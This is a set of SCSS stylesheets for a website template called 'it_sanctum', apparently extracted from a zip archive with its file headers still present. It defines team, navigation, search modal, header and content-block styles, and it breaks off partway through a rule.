							@include breakpoint(mobile-only) {
								margin-bottom: 0 !important;
							}
						}
					}
				}
			}
			@include breakpoint(mobile-only) {
				margin-bottom: 0;
			}
		}
		.g-our-team-item {
			@include breakpoint(mobile-only) {
				margin-bottom: ($content-padding*2) !important;
			}
		}
	}
	.size-33 {
		@include flex(0 33.3333%);
		width: 33.3333%;
		@include breakpoint(mobile-only) {
			@include flex(0 100%);
			width: 100%;
		}
	}

	.size-16 {
		@include flex(0 16.6666%);
		width: 16.6666%;
		@include breakpoint(mobile-only) {
			@include flex(0 100%);
			width: 100%;
		}
	}
}

.g-our-team, .g-our-team-slider, .g-our-team-slideset {
	text-align: center;
	&.gutter-disabled {
		.g-our-team-item {
			border: none;
		}
		.uk-slideset {
			margin-left: 0;
			&.uk-grid {
				> * {
					padding-left: 0;
				}
			}
		}
	}
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
	.g-our-team-item {
		border: 1px solid $base-border-color;
		width: 100%;
		@include breakpoint(mobile-only) {
			margin-bottom: ($content-margin + $content-padding)*2;
			width: 100%;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
	.g-our-team-image {
		position: relative;
		overflow: hidden;
		.g-our-team-social {
			&.uk-overlay-panel {
				padding: 0;
				a {
					width: 100%;
					display: block;
					padding: 10px;
					border: 1px solid rgba(255, 255, 255, 0.2);
					border-right: none;
					@include breakpoint(tablet-range) {
						padding: 10px 5px;
					}
					@include transition(all, 0.2s);
					&:hover {
						background: $accent-color-1;
					}
				}
			}
			.g-block {
				@include breakpoint(mobile-only) {
					@include flex(1);
				}
			}
		}
		img {
			width: 100%;
		}
	}
	.g-info-container {
		padding: 20px;
		background: #ffffff;
	}
	p {
		margin: 0;
	}
	.g-our-team-name {
		margin: 0;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-our-team-position {
		margin-top: 0;
		font-size: 90%;
		&.g-desc-enabled {
			margin-bottom: 20px;
		}
	}
	.g-our-team-desc {
		margin-top: 0.4rem;
	}
	&.style2 {
		.g-our-team-social {
			margin-top: 20px;
			a {
				color: lighten($base-title-color, 15%);
				margin-right: 15px;
				@include breakpoint(tablet-range) {
					margin-right: 8px;
				}
				&:last-child {
					margin-right: 0;
				}
				&:hover {
					color: $accent-color-1;
				}
			}
		}
	}
	&.uk-text-left {
		&.style1 {
			.g-our-team-social {
				text-align: center !important;
			}
		}
	}
	&.style3 {
		.g-our-team-image {
			padding-bottom: 100px;
		}
		.g-info-container {
			position: absolute;
			bottom: 0;
			left: 0;
			right: 0;
			top: auto;
			z-index: 1;
			padding: 23px 30px;
			height: 100px;
			@include transition(all 0.2s);
			.g-our-team-position {
				margin: 5px 0 0;
			}
		}
		.g-hover-container {
			opacity: 0;
			position: absolute;
			background-color: #111111;
			color: #ffffff;
			top: 100px;
			left: 0;
			bottom: 0;
			right: 0;
			padding: 30px;
			@include transition(all 0.2s);
			> * {
				opacity: 0;
				@include transition(all 0.2s);
			}
			.g-our-team-desc {
				font-size: 90%;
			}
			.g-our-team-social {
				margin-top: 25px;
				font-size: 18px;
				a {
					margin-right: 15px;
					@include breakpoint(tablet-range) {
						margin-right: 8px;
					}
					&:last-child {
						margin-right: 0;
					}
				}
			}
		}
		.g-our-team-item {
			position: relative;
			&:hover {
				.g-hover-container {
					opacity: 1;
					> * {
						@include transition-delay(0.3s);
						opacity: 1;
					}
				}
				.g-info-container {
					bottom: 100%;
					margin-bottom: -100px;
					background: $accent-color-1;
					color: #ffffff;
					.g-our-team-name {
						color: #ffffff !important;
						a {
							color: #ffffff !important;
							&:hover {
								text-decoration: underline;
							}
						}
					}
				}
			}
		}
	}
}PK!����//)it_sanctum/scss/sanctum/_content-pro.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-title-color: #4d4d4d !default;

.g-content-pro {
	&:not(.gutter-disabled) {
		margin-left: -($content-padding);
		margin-right: -($content-padding);
		> .g-grid {
			margin-bottom: ($content-padding*2);
			&:last-child {
				margin-bottom: 0;
				> .g-block {
					&:last-child {
						.g-content-pro-item {
							@include breakpoint(mobile-only) {
								margin-bottom: 0 !important;
							}
						}
					}
				}
			}
			@include breakpoint(mobile-only) {
				margin-bottom: 0;
			}
		}
		.g-content-pro-item {
			@include breakpoint(mobile-only) {
				margin-bottom: ($content-padding*2) !important;
			}
		}
	}
	.size-33 {
		@include flex(0 33.3333%);
		width: 33.3333%;
		@include breakpoint(mobile-only) {
			@include flex(0 100%);
			width: 100%;
		}
	}

	.size-16 {
		@include flex(0 16.6666%);
		width: 16.6666%;
		@include breakpoint(mobile-only) {
			@include flex(0 100%);
			width: 100%;
		}
	}
}

.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
	text-align: center;
	&.g-pullup {
		margin-top: -($content-margin + $content-padding + $section-padding + rem(75px));
		position: relative;
		z-index: 21;
		.g-content-pro-item {
			border: none;
		}
	}
	&.gutter-disabled {
		.g-content-pro-item {
			border: none;
		}
		.uk-slideset {
			margin-left: 0;
			&.uk-grid {
				> * {
					padding-left: 0;
				}
			}
		}
	}
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
	.g-content-pro-item {
		border: 1px solid $base-border-color;
		@include breakpoint(mobile-only) {
			margin-bottom: ($content-margin + $content-padding)*2;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
	.g-content-pro-image {
		> a {
			display: block;
		}
		img {
			@include user-select(none);
		}
	}
	.g-info-container {
		padding: 20px;
		background: #ffffff;
	}
	p {
		margin: 0;
	}
	.g-content-pro-title {
		margin: 0;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-content-pro-desc {
		margin-top: 0.4rem;
	}
	.g-info-container-style2 {
		&.uk-overlay-panel {
			padding: 15px;
			p {
				margin-top: 5px;
			}
			a {
				color: #ffffff;
				&:hover {
					color: $accent-color-1;
				}
			}
		}
		.g-content-pro-special, .g-item-details {
			color: lighten($base-text-color, 35%);
		}
	}
	.g-content-pro-special {
		color: lighten($base-text-color, 20%);
		font-style: italic;
		float: left;
		@include breakpoint(small-mobile-range)  {
			float: none;
		}
		@include breakpoint(tablet-range) {
			float: none;
		}
		i {
			margin-right: 5px;
		}
	}
	.g-content-pro-link {
		float: right;
		font-style: italic;
		i {
			margin-left: 10px;
		}
		@include breakpoint(small-mobile-range) {
			float: none;
			margin-top: 5px;
		}
		@include breakpoint(tablet-range) {
			float: none;
			margin-top: 5px;
		}
	}
	.no-special {
		.g-content-pro-link {
			float: none;
		}
	}
	.no-link {
		.g-content-pro-special {
			float: none;
		}
	}
	.g-bottom-info {
		margin-top: 15px;
	}
	.g-item-details {
		margin-top: 0.4rem;
		font-size: 90%;
		color: lighten($base-text-color, 20%);
		.date {
			i {
				margin-right: 5px;
			}
		}
	}
	&.style3 {
		.g-info-container-style2 {
			@include background(linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%));
			padding: 20px;
			a {
				color: #ffffff;
				&:hover {
					color: #ffffff;
					text-decoration: underline;
				}
			}
		}
		.g-content-pro-image {
			.uk-overlay {
				img {
					@include transition(all 1s);
				}
			}
			&:hover {
				.uk-overlay {
					img {
						@include transform(scale(1.15));
					}
				}
			}
		}
	}
}PK!�j|���$it_sanctum/scss/sanctum/_to-top.scssnu&1i�#g-to-top {
	position: fixed;
	bottom: 0;
	left: 0;
	height: 0;
	width: 0;
	.style1 {
		#g-totop-button {
			position: fixed;
			bottom: -40px;
			right: 28px;
			background: rgba(0, 0, 0, 0.4);
			color: #ffffff;
			border-radius: 3px;
			padding: 6px 13px;
			z-index: 999;
			outline: none;
			@include transition(all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s);
			&:hover {
				background: $accent-color-1;
			}
			@include breakpoint(mobile-only) {
				display: none;
			}
			&.totopfixed {
				bottom: 28px;
			}
		}
	}
	.style2 {
		#g-totop-button {
			position: fixed;
			bottom: -40px;
			right: 28px;
			background: rgba(0, 0, 0, 0.4);
			color: #ffffff;
			border-radius: 50%;
			padding: 6px 13px;
			z-index: 999;
			outline: none;
			@include transition(all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s);
			&:hover {
				background: $accent-color-1;
			}
			@include breakpoint(mobile-only) {
				display: none;
			}
			&.totopfixed {
				bottom: 28px;
			}
		}
	}
}PK!1��WW)it_sanctum/scss/sanctum/_afterbottom.scssnu&1i�#g-afterbottom {
	padding: $section-padding 0;
	background-color: $afterbottom-background-color;
	@if $afterbottom-background-image {
    	background-image: url($afterbottom-background-image);
    	background-repeat: unquote($afterbottom-background-repeat);
    	background-size: unquote($afterbottom-background-size);
    	background-attachment: unquote($afterbottom-background-attachment);
	}
	color: $afterbottom-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $afterbottom-heading-color;
	}
}

@media print {
	#g-afterbottom {
		background: #fff !important;
		color: #000 !important;
	}
}PK!�����%it_sanctum/scss/sanctum/_sidebar.scssnu&1i�#g-sidebar {
	padding: $section-padding 0;
	background-color: $sidebar-background-color;
	@if $sidebar-background-image {
    	background-image: url($sidebar-background-image);
    	background-repeat: unquote($sidebar-background-repeat);
    	background-size: unquote($sidebar-background-size);
    	background-attachment: unquote($sidebar-background-attachment);
	}
	color: $sidebar-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $sidebar-heading-color;
	}
	
	.g-features2-particle {
		.g-features2-particle-item {
			flex-basis: 100%;
			margin-bottom: ($content-margin + $content-padding);
				&:last-child {
					margin-bottom: 0;
				}
		}
		.g-features2-particle-title {
			font-size: 1.875rem;
			line-height: 2rem;
		}
		&.style5 {
			.g-features2-particle-icon {
				border-radius: 0px;
				border: 1px solid $base-border-color;
			}
			.g-features2-particle-title {
				font-size: 1.35rem;
			}
		}
	}
}

@media print {
	#g-sidebar {
		background: #fff !important;
		color: #000 !important;
	}
}PK!I�S3��%it_sanctum/scss/sanctum/_mainnav.scssnu&1i�%item-container {
	padding: $content-padding/4 $content-padding/2;
	white-space: nowrap;
	@include transition(background 0.2s, color 0.2s);
}

%dropdown-column {
	width: $menu-col-width;
	float: left;
}

// Main Nav
.g-main-nav {
	&:not(.g-menu-hastouch) {
		.g-toplevel {
			> li {
				> .g-menu-item-container {
					.g-menu-parent-indicator {
						display: none;
					}
				}
			}
		}
		.g-dropdown {
			z-index: 1003;
		}
	}
    z-index: 20;
	.g-standard {
		.g-dropdown {
	    	@extend %dropdown-column;
	    }
	}
	.g-toplevel {

		> li {

			> .g-menu-item-container {
				line-height: 1;
				@extend %item-container;
			}

			> .g-menu-item-container {
				> .g-menu-item-content {
					line-height: normal;
					text-align: center;
				}

				> .g-menu-parent-indicator {
					
				}
			}

			&.g-parent .g-menu-parent-indicator:after {
				width: 1rem;
			}
		}

		i {
			opacity: 1;
		}
	}

	.g-standard > .g-dropdown, .g-fullwidth > .g-dropdown {
		&:before {
			//top: -6px !important;
		}
		.g-dropdown {
			//top: -2px;
		}
	}
	.g-standard .g-dropdown, .g-fullwidth .g-dropdown {
		&:after {
			//left: -11px !important;			
		}
	}

	.g-dropdown {
		text-align: left;
		border-radius: none;
		.dir-rtl & {
			text-align: right;
		}
	}

	.g-sublevel {
		> li {
			margin: 0;
			padding: 0;
			> .g-menu-item-container {
				
				@extend %item-container;
				font-weight: normal;
                > .g-menu-item-content {
                    vertical-align: middle;
                }
			}
    		&.g-parent {
	    		.g-menu-parent-indicator {
	    			right: 10px;
	    			top: 13px;
					&:after {
						content: "\f105";
						opacity: 0.75;
						font-size: 0.9rem;
					}
				}
			}
			&:hover {
	    		&.g-parent {
		    		.g-menu-parent-indicator {
		    			&:after {
		    				content: "\f105" !important;
		    			}
		    		}
		    	}
			}
		}
	}

	.g-fullwidth {
		> .g-dropdown {
			margin: 0 ($content-padding + $content-margin);
			&[data-g-item-width] {
				margin-left: 0;
				margin-right: 0;
			}
			> .g-dropdown-column {
				> .g-grid {
					// Fix for Extended Menu columns in IE
					@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
						@include flex-flow(row);
					}
					.g-block {
						border-right: 1px solid rgba(255, 255, 255, 0.1);
						&:last-child {
							border-right: none;
						}
					}
				}
			}
			.g-sublevel {
				> li {
					&:last-child {

					}
					&:hover, &.active {
			    		.g-menu-parent-indicator {
							&:after {
								color: $navigation-text-color;
								opacity: 1;
							}
						}
					}
					a {
						padding: 12px 20px !important;
					}
					.g-go-back a::before {
						
					}
				}
				.g-menu-parent-indicator {	
					top: 10px !important;				
					&:after {
						background: rgba(0,0,0,0.99);
						color: #ffffff !important;
						border: 1px solid rgba(255, 255, 255, 0.3);
						border-radius: 4px;
						height: 1.5rem;
						width: 1.5rem !important;
						padding: 0.15rem;
						text-align: center;
						line-height: 18px;
						opacity: 1;
						@include transition(all, 0.2s);
					}
					&:hover {
						&:after {
							background: lighten(rgba(0,0,0,0.99), 30%);
						}
					}
				}
			}
		}
	}
}

// Subtitle
.g-menu-item-subtitle {
	opacity: 1;
}

// Dropdown Side Offsets
//@include dropdown-offset-x(10px, left);

// Dropdown Top Offsets
//@include dropdown-offset-y(5px);

.g-menu-overlay.g-menu-overlay-open {
    z-index: 19;
}

// Flyout on the Left Utility
.g-main-nav .g-standard .g-dropdown .flyout-left .g-dropdown {
	left: auto;
	right: 100%;
}

// Touch Device
.g-menu-hastouch {
	.g-standard, .g-fullwidth {
		.g-toplevel {
			> li {
				&.g-menu-item-link-parent {
					> .g-menu-item-container {
						> .g-menu-parent-indicator {
							border-radius: $core-border-radius;
							margin: -0.2rem 0 -0.2rem 0.5rem;
							padding: 0.2rem;
						}
					}
				}
			}
		}
		.g-sublevel {
			> li {
				&.g-menu-item-link-parent {
					> .g-menu-item-container {
						> .g-menu-parent-indicator {
							border-radius: $core-border-radius;
							padding: 0.1rem;
							margin-top: -0.1rem;
							margin-right: -0.1rem;
						}
					}
				}
			}
		}
	}
}

// RTL styling adjustment
[dir="rtl"] {
	.g-main-nav {
		.g-sublevel {
			> li {
				&.g-parent {
					.g-menu-item-content {
						margin-right: 0;
						margin-left: 2rem;
					}
					.g-menu-parent-indicator {
						right: auto;
						left: 10px;
						margin-top: 3px;
						@include transform(rotate(180deg));
					}
				}
			}
		}
		.g-toplevel {
			> li {
				&:last-child {
					margin-right: 5px !important;
					margin-left: 5px !important;
					.g-menu-item-container {
						padding-right: 1rem !important;
					}
				}
			}
		}
		.g-fullwidth {
			> .g-dropdown {
				> .g-dropdown-column {
					> .g-grid {
						.g-block {
							border-right: none;
							border-left: 1px solid rgba(255, 255, 255, 0.1);
							&:last-child {
								border-left: none;
							}
						}
					}
				}
			}
		}
	}
}PK!�wͰ��"it_sanctum/scss/sanctum/_core.scssnu&1i�body, #g-page-surround {
	color: $base-text-color;
	background-color: $base-background-color;
	@if $base-background-image {
    	background-image: url($base-background-image);
    	background-repeat: unquote($base-background-repeat) !important;
    	background-size: unquote($base-background-size) !important;
    	background-attachment: unquote($base-background-attachment);
	}
	-webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

#g-page-surround {
	box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}

@media print {
	#g-page-surround {
		background: #fff !important;
		color: #000 !important;
	}
}

a {
	color: $accent-color-1;
	@include transition(color 0.2s);
	&:hover {
		color: darken($accent-color-1, 15%);
	}
}

h1, h2, h3, h4, h5, h6, strong {
	color: $base-title-color;
}

.button {
	display: inline-block;
	padding: 0.5rem 1rem;
	border-radius: $core-border-radius;
	background: $accent-color-1;
	color: $white;
	border: 1px solid $accent-color-1;
	line-height: $core-line-height;
	font-size: $fontsizes-body-font-size;
	vertical-align: middle;
	text-shadow: none;
	box-shadow: none;
	text-align: center;
	@include transition(background 0.2s);
	&:hover {
		color: $white;
		background: darken($accent-color-1, 8%);
	}
	&:active, &:focus {
		color: $white;
		background: darken($accent-color-1, 6%);
	}
	&.dark {
		background: $base-title-color;
		border: 1px solid $base-title-color;
		&:hover, &:active, &:focus {
			background: lighten($base-title-color, 12%);
		}
	}
	&.empty {
		background: none;
		border: 1px solid $accent-color-1;
		color: $accent-color-1;
		@include transition(all 0.2s);
		&:hover {
			color: #ffffff;
			background: $accent-color-1;
		}
	}
}

.button {
	&.button-grey {
		background: #a8a8a8;
		color: $white;
		border: 1px solid #a8a8a8;
		&:hover {
			background: darken(#a8a8a8, 6%);
			border: 1px solid darken(#a8a8a8, 6%);
		}
	}
	&.button-green {
		background: #4f953b;
		border: 1px solid #4f953b;
		&:hover {
			background: darken(#4f953b, 6%);
			border: 1px solid darken(#4f953b, 6%);
		}
	}
	&.button-orange {
		background: #f26d5b;
		border: 1px solid #f26d5b;
		&:hover {
			background: darken(#f26d5b, 6%);
			border: 1px solid #f26d5b;
		}
	}
	&.button-purple {
		background: #8283a7;
		border: 1px solid #8283a7;
		&:hover {
			background: darken(#8283a7, 6%);
			border: 1px solid darken(#8283a7, 6%);
		}
	}
	&.button-blue {
		background: #2b90d9;
		border: 1px solid #2b90d9;
		&:hover {
			background: darken(#2b90d9, 6%);
			border: 1px solid darken(#2b90d9, 6%);
		}
	}
	&.button-xlarge {
		font-size: 1.4rem
	}
	&.button-large {
		font-size: 1.2rem
	}
	&.button-small {
		font-size: 0.8rem
	}
	&.button-xsmall {
		font-size: 0.7rem
	}
	&.button-block {
		display: block;
	}
}

.g-title {
	margin-top: -5px;
	margin-bottom: 30px;
	position: relative;
	&:after {
		content:"";
		height: 1px;
		width: 70px;
		margin: 20px 0;
		display: block;
		background: $base-border-color;
	}
}

#g-offcanvas, .g-particle-intro {
	.g-title {
		&:before, &:after {
			display: none;
		}
	}
}

#g-aside, #g-sidebar {
	.g-title {
		font-size: $fontsizes-body-font-size*1.5;
		margin-top: 0;
		margin-bottom: 25px;
		&:before, &:after {
			width: 60px;
			@include breakpoint(tablet-range) {
				display: none;
			}
		}
	}
	.text-center, .title-center {
		.g-title {
			&:before, &:after {
				width: 40px;
			}
		}
	}
	.g-content {
		> div {
			margin-bottom: 50px;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
}

// Border utility classes
.border-bottom {
	border-bottom: 1px solid $base-border-color;
}

.border-top {
	border-top: 1px solid $base-border-color;
}

.g-logo {
	margin: 10px 0;
	> .g-content {
		margin-top: 0;
		margin-bottom: 0;
	}
	display: inline-block;
	@include breakpoint(mobile-only) {
		display: block;
		text-align: center;
	}
	img {
		width: auto;
	}
}

.logo-large {
	display: inline-block;
}

// Grid Gutter Utility Class
.g-gutter {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
}

//Fullwidth Utility Class
.fullwidth-section {
	padding: 0 !important;
	> .g-container {
		width: 100%;
	}
	.g-content {
		padding: 0;
		margin: 0;
	}
}

// Center Vertical Utility Classes
.g-center-vertical {
	@include display(flex);
	@include align-items(center);
}

// Fix for Tooltip text styling
.tooltip {
	h1, h2, h3, h4, h5, h6, strong {
		color: #ffffff !important;
	}
}

// DEMO - Presets Menu classes
.presets-demo {
	.g-dropdown {
		.g-menu-item-container {
			&:before {
				content: "";
				position: absolute;
				width: 20px;
				height: 20px;
				margin-top: 2px;
				border-radius: 0px;
				background: #000000;
				border: 1px solid #ffffff;
			}
			.g-menu-item-content {
				margin-left: 30px;
			}
		}
		.preset1 {
			.g-menu-item-container {
				&:before {
					background: #c91f37;
				}
			}
		}
		.preset2 {
			.g-menu-item-container {
				&:before {
					background: #4f953b;
				}
			}
		}
		.preset3 {
			.g-menu-item-container {
				&:before {
					background: #f26d5b;
				}
			}
		}
		.preset4 {
			.g-menu-item-container {
				&:before {
					background: #8283a7;
				}
			}
		}
		.preset5 {
			.g-menu-item-container {
				&:before {
					background: #2b90d9;
				}
			}
		}
		.preset6 {
			.g-menu-item-container {
				&:before {
					background: #f2aa0f;
				}
			}
		}
	}
}

#g-mobilemenu-container {
	.presets-demo {
		.g-dropdown {
			.g-go-back {
				.g-menu-item-container {
					&:before {
						content: "\f053";
						position: relative;
						width: 1.28571em;
						height: auto;
						margin-top: 0;
						border-radius: 0;
						background: none;
					}
					.g-menu-item-content {
						margin-left: 30px;
					}
				}
			}
		}
	}
}

.g-perso {

font-family: "Lato";
    font-weight: 400;
    font-size: 0.9rem;
    color: #ffffff;
    background-color: #7ac572;
}

.g-perso-left { 
margin-bottom: 0;
border-left: -20px solid white;
background-color: #fff;
}

.g-image2 { 
background-image: url("http://www.ptits-anes.fr/images/Demo/elements/story2.jpg");
    background-repeat: no-repeat;
    padding-left:0px;
    padding-top:0px;
    
}

.g-image3 { 
background-image: url("http://www.ptits-anes.fr/images/Demo/elements/story3.jpg");
    background-repeat: no-repeat;

}PK!2�:�MM(it_sanctum/scss/sanctum/_additional.scssnu&1i�#g-additional {
	padding: $section-padding 0;
	background-color: $additional-background-color;
	@if $additional-background-image {
    	background-image: url($additional-background-image);
    	background-repeat: unquote($additional-background-repeat);
    	background-size: unquote($additional-background-size);
    	background-attachment: unquote($additional-background-attachment);
	}
	color: $additional-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $additional-heading-color;
	}
}

@media print {
	#g-additional {
		background: #fff !important;
		color: #000 !important;
	}
}PK!��Y��#it_sanctum/scss/sanctum/_error.scssnu&1i�body.outline-_error {
	h1 {
		margin: 30px 0;
		text-align: center;
	}
	.g-offcanvas-toggle:not(.offcanvas-toggle-particle) {
		display: none;
	}
}PK!�!<n99&it_sanctum/scss/sanctum/_showcase.scssnu&1i�#g-showcase {
	padding: $section-padding 0;
	background-color: $showcase-background-color;
	@if $showcase-background-image {
    	background-image: url($showcase-background-image);
    	background-repeat: unquote($showcase-background-repeat);
    	background-size: unquote($showcase-background-size);
    	background-attachment: unquote($showcase-background-attachment);
	}
	color: $showcase-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $showcase-heading-color;
	}
}

@media print {
	#g-showcase {
		background: #fff !important;
		color: #000 !important;
	}
}PK!-
�7%%$it_sanctum/scss/sanctum/_bottom.scssnu&1i�#g-bottom {
	padding: $section-padding 0;
	background-color: $bottom-background-color;
	@if $bottom-background-image {
    	background-image: url($bottom-background-image);
    	background-repeat: unquote($bottom-background-repeat);
    	background-size: unquote($bottom-background-size);
    	background-attachment: unquote($bottom-background-attachment);
	}
	color: $bottom-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $bottom-heading-color;
	}
}

@media print {
	#g-bottom {
		background: #fff !important;
		color: #000 !important;
	}
}PK!��哣�*it_sanctum/scss/sanctum/_modal-search.scssnu&1i�.modal-search-container {
	&.style1 {
		.uk-modal-dialog {
			text-align: left;
			// Joomla
			.search {
				form {
					margin-bottom: 0;
				}
				input {
					margin-bottom: 0;
					border: none;
					box-shadow: none !important;
					font-size: 2rem;
					color: $base-text-color;
				}
			}
			// Wordpress
			.search-form {
				.search-field {
					border: none;
					box-shadow: none !important;
					font-size: 2rem;
					color: $base-text-color;
				}
				label {
					margin-bottom: 0;
				}
				.search-submit {
					display: none;
				}
			}
			// Grav
			.search-input {
				border: none;
				box-shadow: none !important;
				font-size: 2rem;
				color: $base-text-color;
			}
		}
	}
	&.style2 {
		#modal-search {
			background: rgba(0, 0, 0, 0.7);
			&.uk-open {
				.uk-modal-dialog {
					@include transform(scale(1));
				}
				.uk-close {
					@include transform(scale(1));
				}
			}
			.uk-modal-dialog {
				padding: 0;
				border-radius: 0;
				width: 455px;
				background: none;
				box-shadow: none;
				@include transform(scale(0));
				// Joomla
				.search {
					form {
						margin-bottom: 0;
					}
					input {
						margin-bottom: 0;
						border: none;
						font-size: 2.3rem;
						width: 455px;
						color: #ffffff;
						text-align: center;
						background: none;
						padding: 20px;
						border-radius: 0;
						box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
						@include placeholder {
							color: #ffffff;
							opacity: 1;
						}
						&:focus {
							box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
						}
					}
				}
				// Wordpress
				.search-form {
					.search-field {
						border: none;
						font-size: 2.3rem;
						width: 455px;
						color: #ffffff;
						text-align: center;
						background: none;
						padding: 20px;
						border-radius: 0;
						box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
						@include placeholder {
							color: #ffffff;
							opacity: 1;
						}
						&:focus {
							box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
						}
					}
					label {
						margin-bottom: 0;
					}
					.search-submit {
						display: none;
					}
				}
				// Grav
				.search-input {
					border: none;
					font-size: 2.3rem;
					width: 455px;
					color: #ffffff;
					text-align: center;
					background: none;
					padding: 20px;
					border-radius: 0;
					box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
					@include placeholder {
						color: #ffffff;
						opacity: 1;
					}
					&:focus {
						box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
					}
				}
			}
			.uk-close {
				color: #ffffff !important;
				opacity: 1;
				font-size: 22px;
				top: 35px;
				right: 35px;
				position: absolute;
				@include transform(scale(0));
				@include transition(all 0.3s);
				&:hover {
					@include transform(rotate(90deg));
					color: $accent-color-1 !important;
				}
			}
		}
	}
	// Joomla class for the Search
	.element-invisible {
		border: 0 none;
		height: 1px;
		margin: 0;
		overflow: hidden;
		padding: 0;
		position: absolute;
		width: 1px;
	}
	i {
		opacity: 1 !important;
	}
}PK!�k����$it_sanctum/scss/sanctum/_header.scssnu&1i�#g-header {
	background-color: $header-background-color;
	@if $header-background-image {
    	background-image: url($header-background-image);
    	background-repeat: unquote($header-background-repeat);
    	background-size: unquote($header-background-size);
    	background-attachment: unquote($header-background-attachment);
	}
	color: $header-text-color;
	position: relative;
	z-index: 2;
	text-align: center;

	h1, h2, h3, h4, h5, h6, strong {
		color: $header-heading-color;
	}

	.g-container {
		position: relative;
	}

	.g-content {
		padding-top: 0;
		padding-bottom: 0;
		margin-top: 3rem;
		margin-bottom: 2.5rem;
	}
}

@media print {
	#g-header {
		background: #fff !important;
		color: #000 !important;
	}
}PK!��|�	�	,it_sanctum/scss/sanctum/_image-features.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-title-color: #4d4d4d !default;

.g-image-features {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	.g-grid {
		margin-bottom: $content-padding*2;
		&:last-child {
			margin-bottom: 0;
			.g-block {
				&:last-child {
					.g-image-features-item {
						@include breakpoint(mobile-only) {
							margin-bottom: 0;
						}
					}
				}
			}
		}
		@include breakpoint(mobile-only) {

			margin-bottom: 0;
		}
	}
	> .g-grid {
		> .g-block {
			@include breakpoint(tablet-range) {
				@include flex(0 100%);
				margin-bottom: $content-padding*2;
				&:last-child {
					margin-bottom: 0;
				}
			}
		}
	}
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
	.g-image-features-item {
		background: #ffffff;
		border: 1px solid lighten($base-border-color, 2%);
		box-shadow: 0 3px 3px rgba(0, 0, 0, 0.07);
		border-radius: 3px;
		@include breakpoint(mobile-only) {
			margin-bottom: ($content-margin + $content-padding)*1.5;
		}
		&.layout-right {
			.g-image-features-image {
				&.uk-overlay {
					border-radius: 0 3px 3px 0;
				}
				img {
					border-radius: 0 3px 3px 0;
				}
			}
		}
	}
	.g-image-features-image {
		position: relative;
		img {
			width: 100%;
			border-radius: 3px 0 0 3px;
		}
		.uk-overlay-icon {
			&:before {
				content: "\f0c1";
			}
		}
		&.uk-overlay {
			border-radius: 3px 0 0 3px;
			img {
				@include transition(all 0.3s);
			}
		}
		&:hover {
			&.uk-overlay {
				img {
					@include transform(scale(1.15));
				}
			}
		}
		.uk-overlay-panel {
			z-index: 4;
		}
	}
	.g-image-features-content {
		padding: 20px;
	}
	.g-image-features-desc {
		margin: 0;
	}
	.g-image-features-title {
		margin-top: 0;
		margin-bottom: 1rem;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-bottom-info {
		margin-top: 15px;
	}
	.g-image-feature-special {
		color: lighten($base-text-color, 20%);
		font-style: italic;
		float: left;
		@include breakpoint(small-mobile-range) {
			float: none;
		}
		i {
			margin-right: 5px;
		}
	}
	.g-image-features-link {
		font-style: italic;
		float: right;
		@include breakpoint(small-mobile-range) {
			float: none;
			margin-top: 5px;
		}
		i {
			margin-left: 10px;
		}
	}
	.no-special {
		.g-image-features-link {
			float: none;
		}
	}
}PK!�d`nEE.it_sanctum/scss/sanctum/_offcanvas-toggle.scssnu&1i�.offcanvas-toggle-particle {
    &.g-offcanvas-toggle {
    	display: block;
    	position: relative;
    	top: auto;
    	left: auto;
        right: auto;
    	color: inherit;
    	font-size: inherit;
        line-height: inherit;
    	@include transition(color 0.2s);   	
	}
    i {
        opacity: 1 !important;
    }
}  PK!�|���(it_sanctum/scss/sanctum/_page-title.scssnu&1i�.g-page-title {
	text-align: center;
	@include breakpoint(mobile-only) {
		margin-bottom: -30px;
	}
	h3 {
		margin: 0;
	}
	i {
		display: block;
	}
}PK!r��uNN'it_sanctum/scss/sanctum/_media-box.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-background-color: #ffffff !default;

.g-media-box {
	.g-grid {
		margin-bottom: $content-margin*2;
		&:last-child {
			margin-bottom: 0;
		}
		.g-block {
			margin-right: $content-margin*2;
			@include breakpoint(mobile-only) {
				margin-right: 0;
				margin-bottom: $content-margin*2;
			}
			&:last-child {
				margin-right: 0;
				@include breakpoint(mobile-only) {
					margin-bottom: 0;
				}
			}
		}
	}
	
	.g-media-box-item {
		.g-media-box-content {
			background: $base-background-color;
			padding: 2rem;
			border: 1px solid $base-border-color;
			
			.g-media-box-links {
				.button-media {
					color: $base-text-color;
					background: transparent;
					border: 1px solid $base-border-color;
					width: 3rem;
					height: 3rem;
					line-height: 3rem;
					text-align: center;
